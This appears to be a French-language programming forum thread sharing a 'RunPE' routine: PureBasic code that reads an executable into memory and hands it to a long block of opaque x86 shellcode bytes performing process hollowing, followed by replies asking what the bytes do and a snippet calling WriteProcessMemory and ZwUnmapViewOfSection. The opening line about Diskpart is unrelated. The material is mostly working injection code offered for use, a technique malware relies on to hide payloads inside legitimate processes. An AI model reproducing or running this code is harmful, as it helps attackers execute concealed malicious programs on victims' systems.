Pour Windows, cherches Diskpart

Code : Tout sélectionner
Prototype.l Runpe(IntectedTo.s,*Filebuffer)
Runpe.Runpe = ?Shellcode
If ReadFile(0, "My_app_To_run_in_memory.exe")
length = Lof(0)
*MemoryID = AllocateMemory(length)
If *MemoryID
bytes = ReadData(0, *MemoryID, length)
EndIf
CloseFile(0)
EndIf
InjectTo.s{#MAX_PATH}
GetModuleFileName_(0,@InjectTo,#MAX_PATH)
Runpe(InjectTo,*MemoryID)
DataSection
Shellcode:
Data.b $60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00, $6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00, $00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88, $03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00, $00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8, $32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09, $8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00, $68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A, $00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97, $02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00, $6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36, $E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02, $00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12, $E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51, $FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B, $52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A, $26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00, $8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00, $00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01, $00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF, $71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00, $00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00, $00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A, $00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B, $21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18, $6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF, $74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E, $08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B, $6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84, $C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $C3, $00, $00, $00, $00
EndDataSection
code machine qui s'exécute direct dans le processeurChaudEf a écrit :Merci je testerais ce soir
c'est quoi dans le datasection?
celtic88 a écrit :code machine qui s'exécute direct dans le processeurChaudEf a écrit :Merci je testerais ce soir
c'est quoi dans le datasection?
ban un runpe comme les autres seulement codé en opcode, tkt c est pas un "Ransomware"Zorro a écrit :celtic88 a écrit :code machine qui s'exécute direct dans le processeurChaudEf a écrit :Merci je testerais ce soir
c'est quoi dans le datasection?
je crois que sa question concernait la Nature de ce code Machine (que fait 'il ? )
Code : Tout sélectionner
hKernel32 = OpenLibrary(1, "kernel32.dll")
hNtdll = OpenLibrary(2, "ntdll.dll")
CallFunction(1, "WriteProcessMemory", pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
CallFunction(2, "ZwUnmapViewOfSection" ,,Pi\hProcess, Addr) : Goto EndThread : EndIf